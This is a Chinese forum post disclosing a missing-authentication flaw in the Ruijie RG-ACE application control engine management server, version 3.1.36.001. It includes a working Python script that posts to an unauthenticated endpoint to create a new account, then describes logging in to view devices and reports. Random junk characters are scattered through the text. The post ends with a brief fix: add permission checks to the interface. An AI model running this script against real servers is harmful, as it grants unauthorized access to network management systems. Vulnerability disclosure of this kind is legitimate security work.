找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2194|回复: 0
打印 上一主题 下一主题

锐捷应用控制引擎管理服务器可以增加用户

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:16:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低); L' p0 }/ y: N' T3 o7 ^0 F# l; J

# I5 k6 W- |  C/ b5 L3 b! s, x- N
( A3 Z- M: B, L( Z/ M测试的具体版本是( [( C& E5 k% C# r4 Y. A
产品名称: 锐捷应用控制引擎
, o0 m# J% V8 T/ E版本号: 3.1.36.001 TC
) z9 D5 O5 S! [: q0 |编译时间: 2011042917304 l6 f+ r$ D! h: q% h# g9 r4 g2 e
# B7 s+ ~# Z! Y

5 g2 j* e" M5 y" p) I# {漏洞证明:
" m/ x% O6 I- ?& S8 |9 U 8 R$ M2 o% A4 t; f7 L8 d

) W! l% ]. w, D+ j
* W- D* z7 Y8 _6 X0 r8 Z) x% |! ~2 X0 Z" v/ s
- v, e; X* ~% z4 l3 l2 T9 P
0 e2 A  i8 t/ P0 s. e! K
执行脚本, @' _2 [! A+ L6 |
#! /usr/bin/env python% l2 \' W5 o# y2 w, |
#coding=gbk
) Y7 j; ?2 w6 E( i/ E#RG-ACE管理服务器 V3.1.36.001( x4 Z- [; ~3 E: z) A
import urllib2, urllib,cookielib
/ a3 [$ H/ v* |0 Furl=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
) ^8 M' V0 D' D  yopener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))8 k8 k2 X. N6 e0 w5 h: Z
opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
. h* _/ t  R: o4 r: H! G$ x/ V  tpost=(("event","userManager.doInsertUserInfo"),2 z# z- j' i. s! q* u. H% X- a
("useractionname","addButtonValue"),
7 y  ?  c* ]1 {4 t" P! l("useropermanager","userManager"),# L0 c* e2 B, d: X) ]! t
("userName","t"), #######账号自己加1 [, Z+ ?# x) D. N0 g( q) f  J
("pwd","aaaaaa"),######密码自己加$ C7 P; s3 O' y3 n' G! d( ~
("trueName","ad"),. z4 N( K+ @% G& u. z! s
("email",""),
6 A$ s4 J% j8 V8 w/ T& t7 k("mobilePhone",""),4 l; S/ B, J7 K/ l. [7 P9 d- p
("officePhone",""),% O; `8 k% c% T: c
("addr",""),8 y5 C; z4 L/ h
("submit","确定"))" N4 t% o  z# S) r; l4 e, c0 n3 g8 q  Z
urllib2.install_opener(opener)+ n* {) K1 M9 N, f1 Y4 j% {& n
p=urllib2.urlopen(url, urllib.urlencode(post)).read()  [7 s& i( ?8 ~& V( f
print "Done"
, G5 V" ~+ n7 [* n/ ]5 B' `+ `
2 l. D% `7 L- C2 m7 }登录,连接设备
% ]+ r8 e+ d$ m0 \' J! s7 [, J: J0 Z
! w! |. `$ ^$ i$ e

1 ~4 K. J  q* a5 f5 z% K
  ?9 ~9 ~: s/ g! W7 s
9 m+ V! M0 W: L/ ]3 Q# o, E* L) Y4 }默认的管理员admin权限更大点: f' ~" B  ]! [0 |1 `3 O0 t1 i
8 F5 e0 \( h6 e* E

# |5 U1 i2 H7 f4 N! q" h
+ H- p: j& D1 x7 O: u' G1 L
1 U1 Y1 b0 Z  e  A: E# @3 ?9 S  y4 x7 H" I5 l
修复方案:! P5 u& ]# v% ]5 F3 i3 G0 \/ ?8 p
加强对接口的权限验证) V" U( b9 }9 a0 N9 E

3 b9 M  a/ c# Y
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表